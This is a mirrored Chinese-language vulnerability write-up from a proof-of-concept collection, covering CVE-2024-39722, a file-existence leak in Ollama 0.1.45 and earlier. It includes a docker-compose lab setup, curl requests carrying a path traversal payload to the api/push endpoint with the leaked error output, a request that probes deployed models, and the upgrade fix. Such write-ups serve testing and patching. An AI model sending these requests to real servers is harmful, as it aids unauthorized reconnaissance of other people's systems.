mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-09 04:47:31 +00:00
75 lines
2.1 KiB
Markdown
75 lines
2.1 KiB
Markdown
# Ollama 文件存在性泄露漏洞 CVE-2024-39722
|
||
|
||
## 漏洞描述
|
||
|
||
Ollama 0.1.45 及之前的版本中,攻击者可以通过 `api/push` 端点的路径遍历暴露服务器上存在的文件。
|
||
|
||
当调用 `api/push` 路由并提供一个不存在的路径参数时,服务器会将转义后的 `URI` 直接返回给攻击者,从而泄露目标服务器及执行该请求的用户的文件存在性信息,这一漏洞为攻击者提供了一种探测文件是否存在的手段。
|
||
|
||
参考链接:
|
||
|
||
- https://github.com/advisories/GHSA-cfxq-8762-vx3v
|
||
- https://oligosecurity.webflow.io/blog/more-models-more-probllms
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Ollama ≤ 0.1.45
|
||
Fixed in version 0.1.46
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
docker-compose.yml
|
||
|
||
```
|
||
services:
|
||
ollama:
|
||
image: ollama/ollama:0.1.45
|
||
container_name: ollama
|
||
volumes:
|
||
- ollama:/root/.ollama
|
||
ports:
|
||
- "11434:11434"
|
||
|
||
volumes:
|
||
ollama:
|
||
```
|
||
|
||
执行如下命令启动 Ollama 0.1.45 服务,并拉取任意一个模型,模拟真实部署环境,例如 `codegemma:2b` :
|
||
|
||
```
|
||
docker compose up -d
|
||
docker exec -it ollama ollama run codegemma:2b
|
||
```
|
||
|
||
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.1.45 已经成功运行。
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
通过 HTTP 暴露服务器目录结构:
|
||
|
||
```
|
||
curl http://your-ip:11434/api/push -d '{ "name": "../../../test../../../:../../../test../../../", "insecure": true, "stream": true }'
|
||
-----
|
||
{"status":"retrieving manifest"}
|
||
{"status":"couldn't retrieve manifest"}
|
||
{"error":"stat /root/.ollama/models/manifests/registry.ollama.ai/library/latest: no such file or directory"}
|
||
```
|
||
|
||
|
||
|
||
基于服务器目录结构,可探测部署的模型:
|
||
|
||
```
|
||
curl http://your-ip:11434/api/push -d '{ "name": "codegemma:2b", "insecure": true, "stream": true }'
|
||
```
|
||
|
||
|
||
|
||
## 漏洞修复
|
||
|
||
- 升级至最新版本 https://github.com/ollama/ollama
|